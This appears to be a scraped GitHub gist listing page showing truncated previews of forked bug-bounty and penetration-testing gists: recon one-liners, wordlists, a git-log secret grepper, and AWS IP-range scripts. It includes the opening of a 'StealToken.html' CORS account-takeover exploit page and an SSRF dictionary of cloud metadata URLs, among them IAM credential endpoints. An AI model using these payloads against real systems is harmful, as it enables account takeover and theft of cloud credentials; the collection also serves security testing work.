shahid1996
shahid1996
/ gist:078afb31545bb7b0246babeabe8936e1
Created
February 25, 2020 19:30
— forked from Chan9390/gist:d49c0024aa59edb455c0954ec7eefe37
One liner to get all the IP ranges of AWS Gov regions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes[] | select(.region | contains("gov")) | .ip_prefix' | sort -u |
shahid1996
/ StealToken.html
Created
February 24, 2020 08:50
— forked from andripwn/StealToken.html
Full Account Takeover through CORS with connection Sockets
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head><title>Exploiting CORS</title></head> | |
| <body> | |
| <center> | |
| <h1>Getting your information through CORS</h1> | |
| <button type="button" onclick="ProcessUrls()">Exploit</button> | |
| </div> | |
| <script type="text/javascript"> | |
| var cont = 0; |
shahid1996
/ st8out.sh
Created
February 18, 2020 07:28
— forked from dwisiswant0/st8out.sh
St8out - Extra one-liner for reconnaissance
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ##### | |
| # | |
| # St8out - Extra one-liner for reconnaissance | |
| # | |
| # Usage: ./st8out.sh target.com | |
| # | |
| # Resources: | |
| # - https://github.com/j3ssie/metabigor |
shahid1996
/ oscp_links.md
Created
February 7, 2020 11:04
— forked from natesubra/oscp_links.md
Useful OSCP Links
shahid1996
/ gitgrepper
Created
February 2, 2020 19:56
— forked from EdOverflow/gitgrepper
Simple Bash script to find interesting data in GIT logs.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "*** Running..." | |
| keywords=( | |
| "password" | |
| "key" | |
| "passwd" | |
| "secret" | |
| ) |
shahid1996
/ web-servers.md
Created
January 13, 2020 15:24
— forked from willurd/web-servers.md
Big list of http static server one-liners
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
shahid1996
/ short-wordlist.txt
Created
January 5, 2020 08:39
— forked from tomnomnom/short-wordlist.txt
short-wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /.s3cfg | |
| /phpunit.xml | |
| /nginx.conf | |
| /.vimrc | |
| /LICENSE.md | |
| /yarn.lock | |
| /Gulpfile | |
| /Gulpfile.js | |
| /composer.json | |
| /.npmignore |
shahid1996
/ all.txt
Created
December 25, 2019 16:05
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
shahid1996
/ find-aws-region.py
Created
April 8, 2019 15:12
— forked from 0xbharath/find-aws-region.py
A quick script to determine AWS Region from IP Address
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ipaddress import ip_network, ip_address | |
| import json | |
| import requests | |
| import sys | |
| def find_aws_region(): | |
| ip_json = requests.get('https://ip-ranges.amazonaws.com/ip-ranges.json') | |
| #ip_json = json.load(open('ip-ranges.json')) | |
| ip_json = ip_json.json() | |
| prefixes = ip_json['prefixes'] |
shahid1996
/ cloud_metadata.txt
Created
April 3, 2019 16:47
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |